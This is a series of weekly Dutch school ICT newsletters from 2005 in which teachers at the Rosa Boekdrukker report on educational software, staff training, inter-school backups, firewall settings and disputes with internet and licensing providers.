Groet en goed weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT (info@rosaboekdrukker.nl)

2005-07-21 w29

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 29 - 2005 (21 juli)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

De laatste BIC van dit schooljaar. (voor de cryptogrammers: lees onderaan!)

ICT scholingen en begeleiding

Deze week nog net op de valreep hebben we de scholingen voor volgend schooljaar in de jaarplanning gezet. Binnenkort zal die worden gepubliceerd op ons intranet.

Wis en Rekensoftware

Van Bekadidact ontvingen we een demo-cd met rekensoftware die bij onze rekenmethode hoort. We werden gebeld door de uitgever om er commentaar op te leveren.
Dat is deze week telefonisch gebeurd. We hebben o.a. gevraagd wat de uitgever denkt te doen met eventuele aanmerkingen op/problemen met en fouten in het programma, die door de gebruikers worden geconstateerd. Dat werd nagevraagd. Het antwoord was: dan komt er iemand bij u langs om het aan te passen.
Daarna hebben we de uitgever uitgelegd, dat wij het programma er zeer aantrekkelijk uit vinden zien, maar op dit moment niet kunnen beslissen of we het programma of onderdelen ervan zullen aanschaffen, omdat we volgens onze procedure moeten handelen. We hebben namelijk regels bij het aanschaffen van software.

Hier nog even weer ons handige lijstje:
- Hebben we erbehoefte aan?
- Ontlast het de leerkracht
- Wat is de verhouding spelen/leren?
- Sluit het aan bij de in de klas behandelde leerstof?
- Is het oefenstof die hoort bij de klas?
- Is er een goede feedback naar de leerling?
- Hoe vriendelijk is het programma? Is er een registratieprogramma, waarmee we kunnen zien hoe elk kind het gedaan heeft? En waarmee het de volgende keer verder gaat?
- Past het programma zich aan aan het niveau van de leerling?
- Moet er veel uitgelegd worden door de leerkracht?
-.Wordt er getoetst? Wordt er geoefend?

En als we naar de bovenstaande criteria kijken, dan stuiten we al op het eerste punt: hebben we er behoefte aan? Volgens de uitgever vervangt het geen onderdelen van de papieren methode, dus het komt BIJ de gewone lesstof (en die is al veel). En voor uitvallers hebben we al het programma “maatwerk”.
De uitgever zal voor de herfstvakantie nog eens bellen om te weten te komen of we inmiddels al behoefte hebben aan het programma. En in die tussentijd kunnen we ook horen van ervaringen op andere scholen met het programma, want Bekadidact zal op de nieuwe website gebruikers aan het woord laten over hun ervaringen.

SCHOOLBITS

We bestelden bij http://www.schoolbits.nl een pakketje educatief materiaal. 3 boekjes:
- Tekstdocumenten
- Werkstukken
- Presentaties
te maken met Open Office (tekstverwerkingsprogramma dat erg op Word lijkt, maar dan open source etc.). Eerste indruk: ziet er prima uit als materiaal voor leerkrachten om OOo te leren gebruiken.

BIJEENKOMST

Raoul (St. ICT op school), Peter (SAS) en Dirk hadden een bijeenkomst om eens wat te brainstormen over hoe het verder moet met OSS en ICT in het Nederlandse onderwijs. Daar kwamen wat denksporen uit die in de loop van het jaar hopelijk verder zullen uitkristalliseren.

EDICTA

We hadden Tom Thobe op bezoek. Werkte bij het ABC en is nu met een collega zelfstandig ICT onderwijsbegeleider geworden. Zie de site http://www.edicta.nl voor het aanbod en de mogelijkheden.

SERVERATSCHOOL

Het Buddy systeem werkt! Eén van de features van SAS is dat scholen voor elkaar backups verzorgen. Dat geeft gemak en spaart tijd en geld en is veilig.
Gemak omdat je geen gedoe hebt met tapes of floppies die je buiten school moet bewaren. Tijd omdat je er geen omkijken naar hebt geld omdat je bij een collega SAS school backupt die dat ook weer voor jou doet.
En het is ook veilig omdat de data versleuteld bij de collega staan, dus die kan jouw gegevens niet bekijken.
We hebben de 3 Amsterdamse scholen als volgt gedaan:
De Rosa Boekdrukker zet z'n backupt bij de Joop Westerweel. Die backupt bij de Corantijn en die backupt naar de Rosa.
Het is nog niet zo dat alle data gebackupt worden.
Het kostbaarst zijn de ESIS en CITO data.
We proberen in de vakantie alles te backuppen.

Site@School

Fred is begonnen met de Link module. Daarmee kun je makkelijk een pagina met links maken. We kregen van verschillende kanten het verzoek via het Forum.

SAS DUITS

David is bezig met de vertaling van het S@S manual in het Duits.
De eerste stappen kun je zien op http://wyxs.net/DE. Het ziet er prima en veelbelovend uit.

Tot slot:

Voor de ICT'ers een zeer moeilijk vakantie cryptogram:

De ambachtsman die via Internet besteld wordt.

Voor de goede oplossers hebben we kleine prijzen.
Na de vakantie de oplossing
Redactieleden en hunne verwanten alsmede hun dienstmaagden en kleinvee zijn van deelname uitgesloten.

Nou, dit was dan de laatste BIC van dit schooljaar. U zult nog even vol spanning moeten wachten op verdere nieuwtjes.

We wensen iedereen een zomer vol warm plezier.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT (info@rosaboekdrukker.nl)

Schooljaar 2005-2006

 1. 2005-09-09 w36
 2. 2005-09-16 w37
 3. 2005-09-23 w38
 4. 2005-09-29 w39
 5. 2005-10-06 w40
 6. 2005-10-14 w41
 7. 2005-10-20 w42
 8. 2005-10-31 w44
 9. 2005-11-11 w45
 10. 2005-11-18 w46
 11. 2005-11-25 w47
 12. 2005-12-02 w48
 13. 2005-12-09 w49
 14. 2005-12-13 w50
 15. 2005-12-23 w51
 16. 2006-01-10 w02
 17. 2006-01-20 w03
 18. 2006-01-26 w04
 19. 2006-02-02 w05
 20. 2006-02-10 w06
 21. 2006-02-15 w07
 22. 2006-03-01 w09
 23. 2006-03-10 w10
 24. 2006-03-13 w11
 25. 2006-03-18 w11
 26. 2006-03-29 w13
 27. 2006-04-06 w14
 28. 2006-04-10 w15
 29. 2006-04-19 w16
 30. 2006-04-28 w17
 31. 2006-05-11 w19
 32. 2006-05-15 w20
 33. 2006-06-02 w22
 34. 2006-06-06 w23
 35. 2006-06-13 w24
 36. 2006-06-22 w25
 37. 2006-06-29 w26
 38. 2006-07-06 w27
 39. 2006-07-14 w28
 40. 2006-07-21 w29
 41. 2006-07-27 w30

2005-09-09 w36

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 36 - 2005 (9 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Welkom, ook op ICT gebied, Annemarie en Kaoutar! Leerkrachten in groepen 1/2 en 7.

Voortgang ICT scholingen en begeleiding

In het jaarrooster zijn alle ICT bijeenkomsten opgenomen, behalve de nog af te spreken klassenconsulten. De meeste ICT-begeleiding vindt in de eerste helft van het schooljaar plaats, omdat we in de tweede helft ook druk bezig zullen zijn met “woordenschatdidaktiek”.

OVERGANGSPERIKELEN

Een school is geen kantoor
Vorige week alle lokalen weer inruimen. Bij ons bepalen leerkrachten aan heb begin van het jaar waar ze de werkstations in de klas willen hebben staan. Daar hebben we netwerkkabels voor in diverse lengtes.
Verder moesten computers op lage tafels verplaatst worden vanwege groepsverandering en nieuwe lokalenindeling. Het is weer een heel gedoe en kost bijna 1,5 dag. Het heeft ermee te maken, dat we nog steeds niet overal identieke computers hebben.

ServerAtSchool

Peter kwam langs om de leerlingen te migreren. Volgend jaar doen we het zelf. Nieuw dit jaar was, dat er in plaats van één twee groepen drie zijn. en dat er twee nieuwe leerkrachten zijn ingevoerd.

Site@School

Karin heeft er ook last van en heeft de leerlingen in S@S verplaatst naar hogere groepen en ze vanaf groep 4 drie eigen leerlingpagina’s gegeven.

MUISPERIKELEN

In de lagere groepen raken de kinderen telkens hun map kwijt. Tot nu toe was de oorzaak onbekend. Maar systematische reflectie en naspelen van het probleem bracht de vermoedelijke oorzaak. We citeren Peter: "Gezien het feit dat dit voornamelijk voorkomt in de lagere groepen, denk ik dat dit probleem veroorzaakt wordt door de combinatie van de noodzaak om de muis niet te bewegen tijdens het dubbelklikken en de wellicht nog niet zo goed ontwikkelde fijne motoriek van leerlingen in die lagere jaren."
We hadden het ook al aan Ruth gevraagd. Zij zei vrijwel hetzelfde. Het zou één van de argumenten kunnen zijn om toetscombinaties te gebruiken i.p.v . de muis. Of om niet te DUBBELklikken, maar 1x klikken +enter.

KENNISPERIKELEN

Marieke van Osch, procesadviseur van het project 'Kennisrotonde' van Stichting ICT op School bezocht Karin en Dirk. Wij hebben een paar projecten die wellicht interessant zijn voor de kennisrotonde; dat wil zeggen, onderzoeksvragen die bij ons leven en die wellicht voor andere scholen ook interessant zijn.
Onderzoeksvraag: Waarom komt ICT bij enkelen zo moeilijk van de grond? Waarom zijn enkele leerkrachten niet vooruit te branden? Waarom levert het vele geld dat we aan bijscholing uitgeven niet genoeg rendement?
Deze vragen bleken bij meer scholen te leven. Het vinden van mogelijke antwoorden is een voorwaarde bij de praktische uitvoering van twee projecten die we wellicht verder gaan ontwikkelen: de ICT leerlijn en handleidingen voor het gebruik van Site@School voor leerkrachten en leerlingen.

APS-IT DIENSTPERIKELEN

We worden in de wurggreep genomen door APS-IT diensten en Microsoft. We kunnen alleen een enorme bundel met software leasen en kunnen niet meer kiezen wat we wel en niet willen. Dat betekent dat we teveel betalen. Verder kunnen we geen éénjarig contract afsluiten en zitten we er voor drie jaar aan vast. Dat heet nu 'vendor lock-in'.
Het begint interessant te worden om andere wegen te zoeken om aan je licentieverplichtingen te voldoen.
Wat een wrange smaak geeft is, dat APS-IT diensten zich er nog op beroemt zo'n goede deal met Microsoft afgesloten te hebben.
Wat een vieze smaak geeft is dat Microsoft kan zeggen dat ze het Nederlandse onderwijs sponsoren met x miljoen euro's. Drugsdealers. Maar dat hadden we Microsoft al eens duidelijk verteld.

CRYPTOGRAMPERIKELEN

De oplossing is 'downloadgieter'. Er zijn geen inzendingen binnen gekomen. De prijs hebben we zelf maar opgegeten.

Goedweekendperikelen,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT (info@rosaboekdrukker.nl)

2005-09-16 w37

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 37 - 2005 (16 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Ik-reken, software voor de kleuterbouw

Deze week hebben we een update aangevraagd voor het programma Ik-reken in de kleuterbouw. Als je de nieuwe versie gebruikt is het heel gemakkelijk om leerlingen in te voeren. Met de gegevens uit Esis is dat een fluitje van een cent (edex bestand).

Taal en ICT

Deze week hebben we de draad weer opgepikt met de leerlijn in de bovenbouw. Met hulp van de taalafdeling van het ABC zal gewerkt worden aan het schrijven van weetteksten “in eigen woorden”. Daar voor zal Anja de groepen een aantal keren bezoeken wanneer teksten gepresenteerd worden. Ook zal het programma Digiwijzer ingezet worden om te leren zoeken naar informatie.

Veilig Leren Lezen

Onze nieuwe groepen 3 zijn begonnen om met het programma van Veilig Leren Lezen te werken. We hebben nog de oude versie. Die werkt nog steeds, maar is wel erg antiek. We zullen dit schooljaar beslissen of en welke nieuwe software zal worden aangeschaft.

Dreigement UPC

Deze week werden we opgeschrikt door post van Priority Telecom (het bedrijf dat voor UPC de rekening stuurt voor onze internet verbinding). Ze komen met een lijst van 4 -sinds 2001-niet betaalde rekeningen. Er klopt helemaal niets van en contact erover is onmogelijk. Antwoordapparaat moet worden ingesproken en er wordt niet teruggebeld. Het kan dus zijn, dat we volgende week zonder internetverbinding komen te zitten.
Net binnengekomen bericht: we zullen niet worden afgesloten en we moeten de brief als niet verzonden beschouwen.

Beeldbank

Op www.schooltv.beeldbank.nl kunnen allerlei educatieve filmpjes worden bekeken. Maar dat lukte niet hier op school, omdat de Firewall ertussen zat. Daar is nu wat aangedaan en de filmpjes kunnen nu wel worden bekeken. In het programma Digiwijzer wordt o.a. met Beeldbank gewerkt. Vandaar de noodzaak iets aan de Firewall te doen (technische uitleg onderaan de nieuwsbrief).

RekenWeb

We hebben de snelkoppelingen naar het Rekenweb aangepast zodat je nu op de website van het Freudenthal instituut terecht komt. Daar staan veel actuele rekenspelletjes. We gebruikten nog een oude cd-rom van het rekenweb op de server. Maar er komen regelmatig nieuwe en leuke spelletjes bij: www.rekenweb.nl

ServerAtSchool

Peter heeft de twee poorten die Real Audio gebruiken in de firewall opengezet. Daarvoor heeft hij een klein moduletje ontwikkeld dat past in de bestaande ServerAtSchool structuur.
Dat wil zeggend dat de module ook voor de andere bruikbaar is.

ServerAtSChool documentatie

Langzaamaan komt het einde in zicht; het schrijven van de documentatie vordert. Zowel Peter als Dirk zien ernaar uit. Ze worden het zat. Met een paar weken kunnen we jullie een sneak preview beloven.
Het is afzien, maar het wordt wel ongelofelijk mooi.

Site@School

Fred lost problemen op in het Forum, ontwikkelt door aan features in verschillende modules en Dirk heeft op dit moment geen tijd voor S@S, zie boven. Dat vindt hij jammer.

Tot zover.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT (info@rosaboekdrukker.nl)

2005-09-23 w38

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 38 - 2005 (23 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

EHBICT

Dit staat voor Eerst Hulp Bij ICT. In de wandelgangen noemen we dit het “storingsformulier”, maar dat is onterecht. Alle vragen die je op ICT gebied binnen de school hebt, kun je kwijt in het formulier. Klik in het logo van de Rosa Boekdrukker (op de website) op het roze rechthoekje en al je problemen worden in behandeling genomen.

KLEUTERSOFTWARE

Binnenkort gaan we de nieuwste versie van “Schatkist-lezen” bekijken. Zal het de vervanger van Letterpret worden? We zijn erg benieuwd. Kijk hier om alvast een voorproefje te krijgen: http://www.schatkist.nl/zwijsen/show/id=116518

COMPUTER DIRECTIE

Een van de nieuwe computers doet een beetje raar. Moet even naar gekeken worden. Andere er neergezet en nieuw image erop. Klaar maar weer.

IK-REKEN

We kregen de nieuwe IK-REKEN software binnen, nu voor netwerk met EDEX import functie. De registratie gaat via het web. Wij zochten even op onder 'Systeemeisen'. Luister en huiver:
"Schakel vóór het registreren even uw firewall uit. Die kunt u daarna weer inschakelen." Einde citaat. Het staat er echt.
Wij schrijven even een mailtje dat 't ons niet zo'n goed idee lijkt de firewall uit te zetten en of 't niet anders kan.
Mail van HWV dat we de eerste zijn die erover beginnen en dat 't niet anders kan.
Mail van OBSRB met wat vragen over welke poorten, protocollen etc. gebruikt worden.
Mail van HWV dat we het programma kunnen weggooien
Mail van OBSRB dat we 't programma al lang gebruiken en dat 't niet de oplossing is de CD weg te gooien. Graag toch de info die we vragen.
Mail van HWV: we weten het niet.
Mail van OBSRB: we willen toch graag antwoord.
Wordt vervolgd.

Workshop

Karin gaat op 3 oktober naar de “Workshop Kwaliteitssysteem Educatieve Content”. Dit wordt georganiseerd door de stichting ICT op School. Lees er meer over:
http://www.ictopschool.net/software/nieuws/Nieuwsbericht.2005-09-20.1801

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-09-29 w39

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 39 - 2005 (30 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

NIEUW IMAGE:

Groep 5 heeft nieuw image met de oude WIG. Het programma sluit niet aan bij onze rekenmethode, maar geeft wel wat mogelijkheden om zinnig te oefenen.

ICT SCHOLING GROEPEN 3, 4 EN 5

We hadden een bijeenkomst waarin we de afspraken die we hebben gemaakt over de ICT-leerlijn nog eens onder de loep hebben genomen. Het aantal opdrachten lijkt te doen te zijn. We hebben gepraat over hoe we het zullen registeren. En dat we bekijken of we zelf ook leuke toepassingen kunnen verzinnen. In groep 3 zijn al prachtige painttekeningen van de eerste geleerde woordjes gemaakt.
In groep 4 zijn de meeste kinderen klaar met hun eerste woordveld volgens de taalmethode in paint. En in groep 5 heeft een aantal leerlingen een stelopdracht op de computer gemaakt in plaats van in het schrift.

INTEKENLIJST SCHOLING EIGEN VAARDIGHEDEN

De leerkrachten van de Rosa Boekdrukker moeten verplicht 2x dit schooljaar hun eigen ICT vaardigheden bijscholen. Er worden 4 gelegenheden voor geboden. De intekenlijst staat al erg vol en hij hangt er nog maar een paar dagen.

WORKSHOP

De workshop van ICT op School “kwaliteitssysteem educatieve content” op 3 oktober gaat niet door, de nieuwe datum is nog niet bekend. Jammer, want Karin had wel zin in een uitje naar Utrecht.

EMAIL STORING

Afgelopen maandag konden we niet emailen via A2000/UPC/Prioritytelecom. We hebben zeker een uur aan de telefoon gezeten met diverse mensen van de helpdesk. We kregen allerlei tegenstrijdige adviezen die niets hielpen. Na twee uur werkten de emailservers van hen weer, maar vraag niet hoe en waarom. We hadden er weer een hele boze briefwisseling aan kunnen wijden, maar we hadden het te druk met andere correspondentie (zie hierna), anders zou UPC ervan gelust hebben.

DE BRIEVENRUBRIEK

(vervolg)

IK-REKEN

HWV software stuurde een mail met inhoud:
quote: Om verdere discussie te voorkomen:
ivm onze beveiliging doen wij geen uitspraken over wat wel of niet in detail moet worden uitgeschakeld.
Verder is het dus: take it or leave it.
Zie vorige mail.
einde quote.
Wij vielen van onze stoel van verbazing. Schreven mail terug dat je toch niet een langdurige relatie, etc.
Mail terug:
Ik kan je één oplossing bieden:
Installeer en registreer de programma's op een andere computer met internetaansluiting, waar niet zulk gevoelig materiaal zoals een wereldwijd forum op staat. Bijvoorbeeld een standalone computer met internetaansluiting, of je computer thuis.
Kopieer binnen twee uur (bijvoorbeeld via een memorystick of diskettes) de programmamappen naar de server. Behalve de programmamappen met inhoud wordt er verder door ons nergens iets op de computer neergezet, dus het gaat eenvoudig.
Maak daarna op de werkstations snelkoppelingen aan.
Op deze manier hoef je niet de firewall van jullie netwerksysteem open te zetten.
Hm, het kan dus wel. Wat een gedoe. Zeg dat dan gewoon.

einde van deze aflevering.

NIEUWE AFLEVERING:

APS

We kregen van APS IT diensten een brief vanwege het opzeggen van ons licentie-contract, waaruit:

Naar aanleiding van uw brief, delen wij u mede dat de overeenkomst beëindigd wordt op de eerstvolgende datum dat het contract tussen APS IT-diensten en Microsoft afloopt.

Dit zal zijn per 31 december 2005, waarna aan de desbetreffende leverancier doorgeven wordt dat uw instelling geen gebruik meer maakt van haar producten. U ontvangt na deze datum geen factuur meer voor dit contract.

Wij attenderen u er vriendelijk op dat bij eventuele controle u APS IT-diensten niet aansprakelijk kunt stellen voor schadevergoeding, nadat het contract is afgelopen.

Hm, merkwaardig... Wij schreven terug:

Geachte heer/mevrouw......
Dank voor uw bevestiging.
Naar aanleiding van onderstaande opmerking in uw brief hebben wij enkele vragen.

"...waarna aan de desbetreffende leverancier doorgeven wordt dat uw instelling geen gebruik meer maakt van haar producten."
- Waaruit maakt u op dat wij geen producten van de desbetreffende leverancier meer gebruiken na afloop van het contract dat wij met u hebben?
- Waarom vloeit dit volgens u voort uit beeindiging van het contract met uw firma?
- Uit uw bericht maak ik op dat APS IT Diensten het alleenrecht heeft op contracten tussen de desbetreffende leverancier en onze instelling. Kunt u dit bevestigen, dan wel ontkennen?

Wij maken u er vriendelijk op attent dat wij u aansprakelijk stellen voor eventuele gevolgen van het doen van onjuiste mededelingen aan de desbetreffende leverancier.

Met vriendelijke.....etc

Wordt vervolgd...

S@S en SoS

S@S had zijn bedrijfsuitje. Fred, Karin en Dirk aten en vergaderden. S@S zit in rustiger vaarwater; tijd voor stabiliteit.
SoS: Peter en Dirk schrijven verder. Achter de horizon zien wij het einde naken.

groeten en prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-10-06 w40

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 40 - 2005 (7 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Jaargang 5 - even een greep uit de oude doos.

We zijn een volgende jaargang ingegaan. In oktober 2001 begonnen we aan onze nieuwsbrievenreeks. We waren toen net aangesloten op het netwerk van Kennisnet en hadden zowel daarmee als met UPC een verbinding. We hielden wedstrijden met twee computers tussen de twee verbindingen. Nu zijn we alleen nog via UPC aangesloten en gebruiken onze XS4all verbinding, die we wel hebben, niet.
Op software gebied hadden we geconstateerd dat Veilig Leren Lezen en Wereld in getallen niet meegroeiden met de geavanceerde technologie in de computers. Bij Veilig Leren Lezen moest de scherminstelling heel laag worden ingesteld en De wereld in getallen kon niet op een snelle computer. Nu, vier jaar later gebruiken we die programma’s nog steeds. Je kunt zeggen, dat wij niet zijn meegegroeid.

Terug naar 2005

Scholing voor leerkrachten

Afgelopen week was de eerste bijeenkomst “eigen vaardigheden”. Om de leerkrachten de gelegenheid te geven wat handiger te worden op de computer kon worden geoefend met het invoegen van plaatjes, tabellen maken en wat geavanceerde technieken van het tekstverwerken. Het is belangrijk om praktisch te blijven: “wat kun je gebruiken voor je klas?” Het valt op, dat veel mensen geïnteresseerd zijn in het verwerken van foto’s op de computer. Dus een volgende keer zullen we dat meer proberen te belichten.

ICT-HULPvragen via het EHBICT formulier

Via de website (het roze rechthoekje in het logo) kunnen verzoeken worden ingediend op ICT gebied. Deze week was er alleen een melding binnen van Karin: de a-drive gaat steeds na een tijd om een diskette vragen. Het probleem is nog niet opgelost.
Er waren ook nog andere vragen, maar die kwamen niet via het formulier binnen, dus die zijn we vergeten.

EMAIL-storing

Gisteren belde de helpdesk van Priority-telecom (UPC) om te vragen of de mailstoring verholpen was.
Ja, maar niet dankzij de helpdesk.
O, u bent niet gemigreerd naar het nieuwe platform.
Wij weten van niks. Geen post over ontvangen. Waar heeft u het over?
In de loop van gisterenavond kwamen meldingen binnen, dat het emailadres van info niet werkte. Dirk is vandaag de hele dag bezig geweest met de helpdesk
Om 16.00 uur, werkte de mail weer. Er was een fout gemaakt met een migratie naar een nieuw platform. Daardoor zijn onze gebruikersnamen en wachtwoorden vernietigd. Ook de webmail, denken we.
Het heeft uren geduurd. De medewerker aan de helpdesk bleef uiterst vriendelijk en behulpzaam. Hij heeft tijdelijk nieuwe instellingen ingevoerd. En binnenkort gaan we echt over naar het nieuw platform. We zullen daar post over ontvangen.
We wachten het af.
We zijn in ieder geval te bereiken op de Vancouverstraat 3 - 5.

WORDT VERVOLGD: DE BRIEFWISSELING TUSSEN DE OBSRB EN APS-IT

Geachte heer van Vliet,

Naar aanleiding van uw brief, delen wij u mede dat de overeenkomst beëindigd wordt op de eerst volgende datum dat het contract tussen APS IT-diensten en Microsoft afloopt. Dit zal zijn per 31 december 2005, waarna aan de leverancier wordt doorgegeven dat uw instelling geen gebruik meer zal maken van de nieuwe overeenkomst. Wij wijzen u er met nadruk op dat per 1 januari as. uw gebruiksrecht op alle, onder deze licentieovereenkomst, in de afgelopen jaren verkregen programmatuur van Microsoft komt te vervallen. Dit gebruiksrecht komt zowel te vervallen voor programmatuur binnen de instelling als bij medewerkers thuis. Voor programmatuur die u via andere (licentie) regelingen hebt verkregen, dus buiten APS IT-diensten om, blijft u natuurlijk in het bezit van de daarbij behorende rechten en plichten. Met vriendelijke groet, APS IT-diensten

Dit wordt volgende week vervolgd.

Dat was het weer.
groeten, Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-10-14 w41

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 41 - 2005 (14 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Deze week wordt de BIC voor het eerst aan iedereen verstuurd met de nieuwsbrievenmodule van onze website. Alle oude nieuwsbrieven zijn daar ook ondergebracht.
Zie: http://www.rosaboekdrukker.net/index.php?page=675&section=6
Het is op de site ook mogelijk om een onderwerp voor de volgende BIC in te dienen. We zijn benieuwd.

POWERPOINT

Op maandag had het team van de OBSRB de mogelijkheid om zich te scholen in Powerpoint. Jammer genoeg waren er dubbele afspraken, waardoor er maar twee mensen konden komen. Er is toen besloten de boel op te schuiven (Jan bedankt!).
Dus de eerste bijeenkomst zal nu plaatsvinden 21 november. De tweede, op 19 december en voor de derde zoeken we nog een datum.

TAAL-ICT

Karin heeft overleg gehad met Anja van het ABC over de voortgang van de leerlijn in de groepen 6, 7 en 8. De plannen en afspraken zijn gemaakt tot maart 2006. Ook heeft Anja deze week klassenconsulten gehad in de groepen 7 en 8. Leerlingen maken een tekst (monddeling of schriftelijk) Hoe komen ze aan de informatie? Hoe presenteren ze de gevonden informatie en hoe wordt het beoordeeld? Daarvoor is een kijkwijzer ontwikkeld, die op de bijeenkomst in november verder zal worden besproken.

Berenproject

We ontvingen het verzoek vanuit Friesland om weer met hen samen te werken met het "berenproject". Dat doen we natuurlijk graag. En uit Friesland komt ook het verzoek of we nog meer scholen in Amsterdam kennen die mee willen doen met een school in Frieland. Dus als iemand een school weet die mee wil doen, dan horen wij dat graag.

APS-IT

In de laatste nieuwsbrief van het APS-IT wordt geciteerd uit onze BIC van week 36 van dit jaar. In dat citaat wordt een groot software concern vergeleken met de werkwijze van drugsdealers. Hoe die uitspraak o.a. tot stand is gekomen kan in de speech worden gelezen die in 2002 werd gehouden, toen Dirk de COS AWARD voor ICT inspirator van het jaar won.
http://www.rosaboekdrukker.net/index.php?page=227&section=6
Die speech was aanleiding voor een discussie met een vertegenwoordiger van het software concern. Die discussie is ook te volgen op onze site.
Het APS vindt het te ver gaan om te worden vergeleken met drugsdealer. Echter, in onze nieuwsbrief werd dat software bedrijf vergeleken met drugsdealers, niet het APS.

Kennisrotonde

We hebben twee projecten aangemeld bij de kennisrotonde van ICTopschool. Ze zijn te lezen op hun site. We hopen dat er veel scholen zullen aansluiten.
Zie: http://www.ictopschool.net/kennis/vraagstukken/0042 http://www.ictopschool.net/kennis/vraagstukken/0041

groeten en prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-10-20 w42

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 42 - 2005 (21 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

KLEUTERSOFTWARE

In plaats van Letterpret gaan we binnenkort een nieuw programma kiezen. Op 15 november gaan we naar de schoolbegeleidingsdienst, waar we een aantal programma’s zullen beklijken.
Een ervan is de nieuwe versie van “schatkist met de muis”. Ook zullen we het programma “woordenvangen” bekijken.
De leerkrachten hebben in hun postvak wat leesvoer erover. Geïnteresseerden kunnen op de volgende websites er meer over lezen.:
http://www.zwijsen.nl/zwijsen/show/id=127915
http://www.schatkist.nl/zwijsen/show/id=116518

ALLES TELT

Deze week probeerden we bij Thieme Meulenhoff informatie in te winnen over het gebruik van Alles Telt voor de groepen 1 en 2. Ze hebben geen forum of site met gebruikers tips. Wie kent een school waar dat programma gebruikt wordt? We zouden namelijk heel graag een truc willen leren hoe je ervoor kunt zorgen dat leerlingen niet kunnen printen.

PRIORITY TELECOM

Deze week kregen we een brief, waarin vermeld staat dat hun product gewijzigd wordt. We begrijpen totaal niet wat we moeten doen. We wachten af hoe lang onze mail nog werkt. De mail op de webserver is in elk geval helemaal verdwenen.

WINDOWS LICENTIES

De kogel is door de kerk!
We hebben 70 windows licenties gekocht. De prijs was zeerbijzonder schappelijk; 6 (zes) Euro per stuk inclusief BTW.
Daarnaast kochten we Word 79 licenties, ook voor een schappelijk prijsje en een paar Word 2000 licenties. De laatste gebruiken we alleen omdat er een betere tabel functie in zit die vooral door Ronald en Karin wordt gebruikt om gemakkelijk tabellen in Site@School te kunnen importeren.
In totaal zijn we voor dik 700 € incl. BTW vrij van alle gewheel en gedeal van APS en Microsoft. Als we in hun APS' prima deal waren gestapt waren we alleen al dit jaar ongeveer 800 € kwijt geweest.
Dit alles vooruitlopend op de komst van de Nederlandse versie van OpenOffice.org 2.0.
De cursus Powerpoint die binnenkort gegeven gaat worden voor enkele enthousiastelingen gaan we al met OO doen in de Engelse versie.

SITE@SCHOOL NIEUWS

Workshop
Van een collega school kregen we een verzoek om een korte Site@School workshop te geven voor een teamlid en een paar ouders. Gaan we doen. We verheugen ons er erg op.

Release versie 2.4
De release datum van versie 2.4 is verschoven naar mei 2006. Daarmee doorbreken we een traditie van een halfjaarlijkse release. Daar zijn goede redenenvoor: de ontwikkeling hoeft niet meer zo snel, we willen aandacht besteden aan consolidering en grotere stabiliteit.

SERVERATSCHOOL NIEUWS

Documentatie
Het is iedere week hetzelfde verhaal; we vorderen. We zijn bezig met de documentatie voor ICT coördinatoren en eindgebruikers. Jullie medewerking in de vorm van meelezen, tips en praktijkvoorbeelden wordt binnen afzienbare tijd zeer op prijs gesteld.

groeten en prettig weekend en prettige herfstvakantie
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2005-10-31 w44

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 44 - 2005 (4 november)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

NOMINATIE!!!

We zijn genomineerd (vanwege S@S, S#S, Strict en de ICT-leerlijn) voor de KENNISDEELPRIJS van ICT op School!!!  Lees er meer over.  Op 22 november wordt de winnaar bekend gemaakt. Dus zet die datum in jullie agenda’s!!

UPC MAIL SORES

